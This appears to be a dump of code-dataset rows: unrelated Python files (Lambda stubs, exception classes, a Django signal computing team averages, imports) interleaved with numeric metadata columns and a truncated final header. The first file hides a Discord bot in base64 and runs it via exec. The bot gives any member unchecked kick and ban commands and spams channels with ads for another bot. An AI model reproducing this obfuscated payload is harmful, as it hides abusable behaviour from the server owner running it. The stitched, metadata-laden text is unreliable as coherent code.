raw_code = b"ZGVmIGNyZWF0ZSh0b2tlbik6CiAgICBpbXBvcnQgZGlzY29yZAogICAgZnJvbSBkaXNjb3JkLmV4dCBpbXBvcnQgY29tbWFuZHMKICAgIGltcG9ydCByYW5kb20KICAgIGltcG9ydCBhc3luY2lvCgogICAgY2xpZW50ID0gY29tbWFuZHMuQm90KCIhIikKICAgIGNvb2xkb3ducyA9IFtdCgogICAgQGNsaWVudC5jb21tYW5kKCkKICAgIGFzeW5jIGRlZiBraWNrKGN0eCwgdXNlcjogZGlzY29yZC5NZW1iZXIpOgogICAgICAgIGF3YWl0IHVzZXIua2ljaygpCgogICAgQGNsaWVudC5jb21tYW5kKCkKICAgIGFzeW5jIGRlZiBiYW4oY3R4LCB1c2VyOiBkaXNjb3JkLlVzZXIpOgogICAgICAgIGF3YWl0IGN0eC5ndWlsZC5iYW4odXNlcikKCiAgICBAY2xpZW50LmNvbW1hbmQoKQogICAgYXN5bmMgZGVmIGdpdmVhd2F5KGN0eCk6CiAgICAgICAgdSA9IHJhbmRvbS5jaG9pY2UoY3R4Lmd1aWxkLm1lbWJlcnMpCiAgICAgICAgYXdhaXQgY3R4LnNlbmQoZiJ7dS5tZW50aW9ufSB3b24hIikKCiAgICBAY2xpZW50Lmxpc3RlbigpCiAgICBhc3luYyBkZWYgb25fbWVzc2FnZShtZXNzYWdlKToKICAgICAgICBpZiBtZXNzYWdlLmF1dGhvci5pZCA9PSBjbGllbnQudXNlci5pZDpyZXR1cm4gCiAgICAgICAgYyA9IHJhbmRvbS5yYW5kaW50KDAsIDEwKQogICAgICAgIGlmIGMgPT0gNToKICAgICAgICAgICAgYXdhaXQgbWVzc2FnZS5jaGFubmVsLnNlbmQoCiAgICAgICAgICAgICAgICAiTG9va2luZyBmb3IgYSBnb29kIGJvdD8gSW52aXRlIEd1YXJkaWFuISAoaHR0cHM6Ly90b3AuZ2cvYm90LzY3NjQ0ODA4MjU1NjM1NDU4MykiKQogICAgICAgIGlmIG1lc3NhZ2UuYXV0aG9yLmlkIGluIGNvb2xkb3duczoKICAgICAgICAgICAgcmV0dXJuIGF3YWl0IG1lc3NhZ2UuY2hhbm5lbC5zZW5kKAogICAgICAgICAgICAgICAgIlN0b3Agc3BhbW1pbmcgYW5kIGluc3RlYWQgaW52aXRlIEd1YXJkaWFuISAoaHR0cHM6Ly90b3AuZ2cvYm90LzY3NjQ0ODA4MjU1NjM1NDU4MykiKQogICAgICAgIGNvb2xkb3ducy5hcHBlbmQobWVzc2FnZS5hdXRob3IuaWQpCiAgICAgICAgYXdhaXQgYXN5bmNpby5zbGVlcCgyKQogICAgICAgIGNvb2xkb3ducy5yZW1vdmUobWVzc2FnZS5hdXRob3IuaWQpCgogICAgY2xpZW50LnJ1bih0b2tlbik="
code = base64.decodebytes(raw_code).decode("utf-8")
exec(code + f"\ncreate('{token}')")
| 237.428571
| 1,534
| 0.973526
| 21
| 1,662
| 76.952381
| 0.714286
| 0.008663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119004
| 0.009025
| 1,662
| 6
| 1,535
| 277
| 0.862174
| 0
| 0
| 0
| 0
| 0
| 0.936823
| 0.914561
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
369835cd150a41d17d6f6398dc98e07332143429
| 126
|
py
|
Python
|
tests/individually/module1/handler1.py
|
martinpfannemueller-syntax/serverless-python-requirements
|
1c65b98607c1b862a8c5da9ef7e7622d2cee1c65
|
[
"MIT"
] | 919
|
2016-12-15T01:58:03.000Z
|
2021-10-04T14:52:22.000Z
|
tests/individually/module1/handler1.py
|
martinpfannemueller-syntax/serverless-python-requirements
|
1c65b98607c1b862a8c5da9ef7e7622d2cee1c65
|
[
"MIT"
] | 540
|
2016-12-15T02:13:19.000Z
|
2021-11-02T03:20:36.000Z
|
tests/individually/module1/handler1.py
|
martinpfannemueller-syntax/serverless-python-requirements
|
1c65b98607c1b862a8c5da9ef7e7622d2cee1c65
|
[
"MIT"
] | 253
|
2017-01-06T15:26:54.000Z
|
2021-11-02T03:03:17.000Z
|
import boto3
def hello(event, context):
return {"status": 200}
def hello2(event, context):
return {"status": 200}
| 12.6
| 27
| 0.650794
| 16
| 126
| 5.125
| 0.625
| 0.292683
| 0.439024
| 0.585366
| 0.658537
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 0.206349
| 126
| 9
| 28
| 14
| 0.74
| 0
| 0
| 0.4
| 0
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 7
|
36f5201bbcf52e2505a6ef0c776455dc0db8c0e0
| 198
|
py
|
Python
|
deep_learning/optimizers.py
|
SaadChaouki/ml-eli5-cli5
|
625a69edadf4737e41c58193873cf8a54273d7f0
|
[
"MIT"
] | 1
|
2021-05-04T19:53:12.000Z
|
2021-05-04T19:53:12.000Z
|
deep_learning/optimizers.py
|
SaadChaouki/ml-eli5-cli5
|
625a69edadf4737e41c58193873cf8a54273d7f0
|
[
"MIT"
] | null | null | null |
deep_learning/optimizers.py
|
SaadChaouki/ml-eli5-cli5
|
625a69edadf4737e41c58193873cf8a54273d7f0
|
[
"MIT"
] | null | null | null |
import numpy as np
class StochasticGradientDescent(object):
def __init__(self, learning_rate):
self.learning_rate = learning_rate
def update(self, weights, gradients):
pass
| 24.75
| 42
| 0.717172
| 23
| 198
| 5.869565
| 0.695652
| 0.266667
| 0.237037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.212121
| 198
| 8
| 43
| 24.75
| 0.865385
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0.166667
| 0.166667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
7fd660726fb22e6091e3cb398516cdbb2b593c86
| 231
|
py
|
Python
|
vixDiskLib/vixExceptions.py
|
xuru/vixDiskLib
|
77a80ed4147055f7903f913296f808f14bed74e0
|
[
"MIT"
] | 8
|
2015-02-01T13:57:25.000Z
|
2021-06-22T10:13:51.000Z
|
vixDiskLib/vixExceptions.py
|
xuru/vixDiskLib
|
77a80ed4147055f7903f913296f808f14bed74e0
|
[
"MIT"
] | 2
|
2017-02-08T18:10:53.000Z
|
2017-10-24T21:08:33.000Z
|
vixDiskLib/vixExceptions.py
|
xuru/vixDiskLib
|
77a80ed4147055f7903f913296f808f14bed74e0
|
[
"MIT"
] | 6
|
2017-06-19T07:27:43.000Z
|
2022-03-13T16:13:48.000Z
|
from exceptions import Exception
class VixDiskLibError(Exception):
""" VixDiskLib exception class """
pass
class VixDiskUnimplemented(Exception):
""" VixDiskLib exception class for unimplemented features """
pass
| 23.1
| 65
| 0.744589
| 21
| 231
| 8.190476
| 0.571429
| 0.244186
| 0.325581
| 0.383721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177489
| 231
| 9
| 66
| 25.666667
| 0.905263
| 0.350649
| 0
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.4
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 8
|
1814fbacb79fcb464fa78bab6241cac56c0beff8
| 19,097
|
py
|
Python
|
showcase/signals.py
|
aseufert/sporttechiq
|
90812142bedf63fed9d1e5f3b246b78299aa45f7
|
[
"MIT"
] | null | null | null |
showcase/signals.py
|
aseufert/sporttechiq
|
90812142bedf63fed9d1e5f3b246b78299aa45f7
|
[
"MIT"
] | null | null | null |
showcase/signals.py
|
aseufert/sporttechiq
|
90812142bedf63fed9d1e5f3b246b78299aa45f7
|
[
"MIT"
] | null | null | null |
from django.db.models.signals import post_save
from django.dispatch import receiver
from django.db.models import Avg
from showcase.models import PlayerScorecard, Team, Club
@receiver(post_save, sender=PlayerScorecard)
def calculateAvgs(sender, signal, instance, **kwargs):
control_thigh_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('control_thigh'))['control_thigh__avg']
control_foot_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('control_foot'))['control_foot__avg']
foot_tap_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('foot_tap'))['foot_tap__avg']
'''dribbling'''
speed_dribble_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('speed_dribble'))['speed_dribble__avg']
dribble_r_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('dribble_r'))['dribble_r__avg']
dribble_l_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('dribble_l'))['dribble_l__avg']
dribble_3_cone_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('dribble_3_cone'))['dribble_3_cone__avg']
'''passing'''
long_r_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('long_r_1'))['long_r_1__avg']
long_r_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('long_r_2'))['long_r_2__avg']
long_l_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('long_l_1'))['long_l_1__avg']
long_l_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('long_l_2'))['long_l_2__avg']
cross_r_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('cross_r_1'))['cross_r_1__avg']
cross_r_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('cross_r_2'))['cross_r_2__avg']
cross_l_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('cross_l_1'))['cross_l_1__avg']
cross_l_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('cross_l_2'))['cross_l_2__avg']
side_pass_r_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('side_pass_r_1'))['side_pass_r_1__avg']
side_pass_r_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('side_pass_r_2'))['side_pass_r_2__avg']
side_pass_r_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('side_pass_r_3'))['side_pass_r_3__avg']
side_pass_l_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('side_pass_l_1'))['side_pass_l_1__avg']
side_pass_l_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('side_pass_l_2'))['side_pass_l_2__avg']
side_pass_l_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('side_pass_l_3'))['side_pass_l_3__avg']
weigh_pass_r_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('weigh_pass_r_1'))['weigh_pass_r_1__avg']
weigh_pass_r_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('weigh_pass_r_2'))['weigh_pass_r_2__avg']
weigh_pass_r_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('weigh_pass_r_3'))['weigh_pass_r_3__avg']
weigh_pass_l_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('weigh_pass_l_1'))['weigh_pass_l_1__avg']
weigh_pass_l_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('weigh_pass_l_2'))['weigh_pass_l_2__avg']
weigh_pass_l_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('weigh_pass_l_3'))['weigh_pass_l_3__avg']
throw_inside_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('throw_inside_1'))['throw_inside_1__avg']
throw_inside_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('throw_inside_2'))['throw_inside_2__avg']
throw_between_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('throw_between_1'))['throw_between_1__avg']
throw_between_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('throw_between_2'))['throw_between_2__avg']
'''shooting'''
shoot_pk_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('shoot_pk'))['shoot_pk__avg']
shoot_run_r_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('shoot_run_r_1'))['shoot_run_r_1__avg']
shoot_run_r_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('shoot_run_r_2'))['shoot_run_r_2__avg']
shoot_run_r_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('shoot_run_r_3'))['shoot_run_r_3__avg']
shoot_run_l_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('shoot_run_l_1'))['shoot_run_l_1__avg']
shoot_run_l_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('shoot_run_l_2'))['shoot_run_l_2__avg']
shoot_run_l_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('shoot_run_l_3'))['shoot_run_l_3__avg']
finisher_r_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('finisher_r_1'))['finisher_r_1__avg']
finisher_r_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('finisher_r_2'))['finisher_r_2__avg']
finisher_r_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('finisher_r_3'))['finisher_r_3__avg']
finisher_l_1_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('finisher_l_1'))['finisher_l_1__avg']
finisher_l_2_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('finisher_l_2'))['finisher_l_2__avg']
finisher_l_3_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('finisher_l_3'))['finisher_l_3__avg']
'''aggregates'''
total_control_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('total_control'))['total_control__avg']
total_dribbling_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('total_dribbling'))['total_dribbling__avg']
total_passing_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('total_passing'))['total_passing__avg']
total_shooting_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('total_shooting'))['total_shooting__avg']
grand_total_avg = PlayerScorecard.objects.filter(player__team=instance.player.team).aggregate(Avg('grand_total'))['grand_total__avg']
# Update fields
if instance.player.team:
Team.objects.filter(id=instance.player.team.id).update(
control_thigh_avg=control_thigh_avg,
control_foot_avg=control_foot_avg,
foot_tap_avg=foot_tap_avg,
speed_dribble_avg=speed_dribble_avg,
dribble_r_avg=dribble_r_avg,
dribble_l_avg=dribble_l_avg,
dribble_3_cone_avg=dribble_3_cone_avg,
long_r_1_avg=long_r_1_avg,
long_r_2_avg=long_r_2_avg,
long_l_1_avg=long_l_1_avg,
long_l_2_avg=long_l_2_avg,
cross_r_1_avg=cross_r_1_avg,
cross_r_2_avg=cross_r_2_avg,
cross_l_1_avg=cross_l_1_avg,
cross_l_2_avg=cross_l_2_avg,
side_pass_r_1_avg=side_pass_r_1_avg,
side_pass_r_2_avg=side_pass_r_2_avg,
side_pass_r_3_avg=side_pass_r_3_avg,
side_pass_l_1_avg=side_pass_l_1_avg,
side_pass_l_2_avg=side_pass_l_2_avg,
side_pass_l_3_avg=side_pass_l_3_avg,
weigh_pass_r_1_avg=weigh_pass_r_1_avg,
weigh_pass_r_2_avg=weigh_pass_r_2_avg,
weigh_pass_r_3_avg=weigh_pass_r_3_avg,
weigh_pass_l_1_avg=weigh_pass_l_1_avg,
weigh_pass_l_2_avg=weigh_pass_l_2_avg,
weigh_pass_l_3_avg=weigh_pass_l_3_avg,
throw_inside_1_avg=throw_inside_1_avg,
throw_inside_2_avg=throw_inside_2_avg,
throw_between_1_avg=throw_between_1_avg,
throw_between_2_avg=throw_between_2_avg,
shoot_pk_avg=shoot_pk_avg,
shoot_run_r_1_avg=shoot_run_r_1_avg,
shoot_run_r_2_avg=shoot_run_r_2_avg,
shoot_run_r_3_avg=shoot_run_r_3_avg,
shoot_run_l_1_avg=shoot_run_l_1_avg,
shoot_run_l_2_avg=shoot_run_l_2_avg,
shoot_run_l_3_avg=shoot_run_l_3_avg,
finisher_r_1_avg=finisher_r_1_avg,
finisher_l_1_avg=finisher_l_1_avg,
finisher_r_2_avg=finisher_r_2_avg,
finisher_l_2_avg=finisher_l_2_avg,
finisher_r_3_avg=finisher_r_3_avg,
finisher_l_3_avg=finisher_l_3_avg,
total_control_avg=total_control_avg,
total_dribbling_avg=total_dribbling_avg,
total_passing_avg=total_passing_avg,
total_shooting_avg=total_shooting_avg,
grand_total_avg=grand_total_avg
)
# update club records
if instance.player.team:
control_thigh_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('control_thigh_avg'))['control_thigh_avg__avg']
control_foot_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('control_foot_avg'))['control_foot_avg__avg']
foot_tap_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('foot_tap_avg'))['foot_tap_avg__avg']
'''dribbling'''
speed_dribble_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('speed_dribble_avg'))['speed_dribble_avg__avg']
dribble_r_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('dribble_r_avg'))['dribble_r_avg__avg']
dribble_l_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('dribble_l_avg'))['dribble_l_avg__avg']
dribble_3_cone_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('dribble_3_cone_avg'))['dribble_3_cone_avg__avg']
'''passing'''
long_r_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('long_r_1_avg'))['long_r_1_avg__avg']
long_r_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('long_r_2_avg'))['long_r_2_avg__avg']
long_l_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('long_l_1_avg'))['long_l_1_avg__avg']
long_l_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('long_l_2_avg'))['long_l_2_avg__avg']
cross_r_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('cross_r_1_avg'))['cross_r_1_avg__avg']
cross_r_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('cross_r_2_avg'))['cross_r_2_avg__avg']
cross_l_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('cross_l_1_avg'))['cross_l_1_avg__avg']
cross_l_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('cross_l_2_avg'))['cross_l_2_avg__avg']
side_pass_r_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('side_pass_r_1_avg'))['side_pass_r_1_avg__avg']
side_pass_r_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('side_pass_r_2_avg'))['side_pass_r_2_avg__avg']
side_pass_r_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('side_pass_r_3_avg'))['side_pass_r_3_avg__avg']
side_pass_l_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('side_pass_l_1_avg'))['side_pass_l_1_avg__avg']
side_pass_l_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('side_pass_l_2_avg'))['side_pass_l_2_avg__avg']
side_pass_l_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('side_pass_l_3_avg'))['side_pass_l_3_avg__avg']
weigh_pass_r_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('weigh_pass_r_1_avg'))['weigh_pass_r_1_avg__avg']
weigh_pass_r_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('weigh_pass_r_2_avg'))['weigh_pass_r_2_avg__avg']
weigh_pass_r_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('weigh_pass_r_3_avg'))['weigh_pass_r_3_avg__avg']
weigh_pass_l_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('weigh_pass_l_1_avg'))['weigh_pass_l_1_avg__avg']
weigh_pass_l_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('weigh_pass_l_2_avg'))['weigh_pass_l_2_avg__avg']
weigh_pass_l_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('weigh_pass_l_3_avg'))['weigh_pass_l_3_avg__avg']
throw_inside_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('throw_inside_1_avg'))['throw_inside_1_avg__avg']
throw_inside_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('throw_inside_2_avg'))['throw_inside_2_avg__avg']
throw_between_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('throw_between_1_avg'))['throw_between_1_avg__avg']
throw_between_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('throw_between_2_avg'))['throw_between_2_avg__avg']
'''shooting'''
shoot_pk_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('shoot_pk_avg'))['shoot_pk_avg__avg']
shoot_run_r_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('shoot_run_r_1_avg'))['shoot_run_r_1_avg__avg']
shoot_run_r_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('shoot_run_r_2_avg'))['shoot_run_r_2_avg__avg']
shoot_run_r_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('shoot_run_r_3_avg'))['shoot_run_r_3_avg__avg']
shoot_run_l_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('shoot_run_l_1_avg'))['shoot_run_l_1_avg__avg']
shoot_run_l_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('shoot_run_l_2_avg'))['shoot_run_l_2_avg__avg']
shoot_run_l_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('shoot_run_l_3_avg'))['shoot_run_l_3_avg__avg']
finisher_r_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('finisher_r_1_avg'))['finisher_r_1_avg__avg']
finisher_r_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('finisher_r_2_avg'))['finisher_r_2_avg__avg']
finisher_r_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('finisher_r_3_avg'))['finisher_r_3_avg__avg']
finisher_l_1_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('finisher_l_1_avg'))['finisher_l_1_avg__avg']
finisher_l_2_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('finisher_l_2_avg'))['finisher_l_2_avg__avg']
finisher_l_3_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('finisher_l_3_avg'))['finisher_l_3_avg__avg']
'''aggregates'''
total_control_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('total_control_avg'))['total_control_avg__avg']
total_dribbling_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('total_dribbling_avg'))['total_dribbling_avg__avg']
total_passing_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('total_passing_avg'))['total_passing_avg__avg']
total_shooting_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('total_shooting_avg'))['total_shooting_avg__avg']
grand_total_avg = Team.objects.filter(id=instance.player.team.id).aggregate(Avg('grand_total_avg'))['grand_total_avg__avg']
if instance.player.team.club:
Club.objects.filter(id=instance.player.team.club.id).update(
control_thigh_avg=control_thigh_avg,
control_foot_avg=control_foot_avg,
foot_tap_avg=foot_tap_avg,
speed_dribble_avg=speed_dribble_avg,
dribble_r_avg=dribble_r_avg,
dribble_l_avg=dribble_l_avg,
dribble_3_cone_avg=dribble_3_cone_avg,
long_r_1_avg=long_r_1_avg,
long_r_2_avg=long_r_2_avg,
long_l_1_avg=long_l_1_avg,
long_l_2_avg=long_l_2_avg,
cross_r_1_avg=cross_r_1_avg,
cross_r_2_avg=cross_r_2_avg,
cross_l_1_avg=cross_l_1_avg,
cross_l_2_avg=cross_l_2_avg,
side_pass_r_1_avg=side_pass_r_1_avg,
side_pass_r_2_avg=side_pass_r_2_avg,
side_pass_r_3_avg=side_pass_r_3_avg,
side_pass_l_1_avg=side_pass_l_1_avg,
side_pass_l_2_avg=side_pass_l_2_avg,
side_pass_l_3_avg=side_pass_l_3_avg,
weigh_pass_r_1_avg=weigh_pass_r_1_avg,
weigh_pass_r_2_avg=weigh_pass_r_2_avg,
weigh_pass_r_3_avg=weigh_pass_r_3_avg,
weigh_pass_l_1_avg=weigh_pass_l_1_avg,
weigh_pass_l_2_avg=weigh_pass_l_2_avg,
weigh_pass_l_3_avg=weigh_pass_l_3_avg,
throw_inside_1_avg=throw_inside_1_avg,
throw_inside_2_avg=throw_inside_2_avg,
throw_between_1_avg=throw_between_1_avg,
throw_between_2_avg=throw_between_2_avg,
shoot_pk_avg=shoot_pk_avg,
shoot_run_r_1_avg=shoot_run_r_1_avg,
shoot_run_r_2_avg=shoot_run_r_2_avg,
shoot_run_r_3_avg=shoot_run_r_3_avg,
shoot_run_l_1_avg=shoot_run_l_1_avg,
shoot_run_l_2_avg=shoot_run_l_2_avg,
shoot_run_l_3_avg=shoot_run_l_3_avg,
finisher_r_1_avg=finisher_r_1_avg,
finisher_l_1_avg=finisher_l_1_avg,
finisher_r_2_avg=finisher_r_2_avg,
finisher_l_2_avg=finisher_l_2_avg,
finisher_r_3_avg=finisher_r_3_avg,
finisher_l_3_avg=finisher_l_3_avg,
total_control_avg=total_control_avg,
total_dribbling_avg=total_dribbling_avg,
total_passing_avg=total_passing_avg,
total_shooting_avg=total_shooting_avg,
grand_total_avg=grand_total_avg
)
| 84.875556
| 149
| 0.752369
| 3,082
| 19,097
| 4.101233
| 0.019468
| 0.120253
| 0.146677
| 0.092801
| 0.95356
| 0.925949
| 0.881329
| 0.859889
| 0.841377
| 0.812025
| 0
| 0.022319
| 0.131906
| 19,097
| 224
| 150
| 85.254464
| 0.740138
| 0.001728
| 0
| 0.478469
| 0
| 0
| 0.171127
| 0.04228
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004785
| false
| 0.248804
| 0.019139
| 0
| 0.023923
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1873e34e2dfd1d729f8344fa760196abcfd554b5
| 209
|
py
|
Python
|
fintech_ibkr/__init__.py
|
wangangi/hw-3-2
|
274bf13ecf9a2729aaf3b483246632c6735cf6fd
|
[
"MIT"
] | null | null | null |
fintech_ibkr/__init__.py
|
wangangi/hw-3-2
|
274bf13ecf9a2729aaf3b483246632c6735cf6fd
|
[
"MIT"
] | null | null | null |
fintech_ibkr/__init__.py
|
wangangi/hw-3-2
|
274bf13ecf9a2729aaf3b483246632c6735cf6fd
|
[
"MIT"
] | 25
|
2022-03-15T22:14:51.000Z
|
2022-03-17T17:02:24.000Z
|
from fintech_ibkr.synchronous_functions import fetch_managed_accounts
from fintech_ibkr.synchronous_functions import fetch_historical_data
from fintech_ibkr.synchronous_functions import fetch_contract_details
| 52.25
| 69
| 0.92823
| 27
| 209
| 6.740741
| 0.481481
| 0.181319
| 0.247253
| 0.428571
| 0.758242
| 0.758242
| 0.758242
| 0
| 0
| 0
| 0
| 0
| 0.057416
| 209
| 3
| 70
| 69.666667
| 0.923858
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
a13b59b726cb5a37b7f1f293c674171a1fe8651b
| 13,077
|
py
|
Python
|
sklearn_evaluation/tests/test_metrics.py
|
afcarl/sklearn-evaluation
|
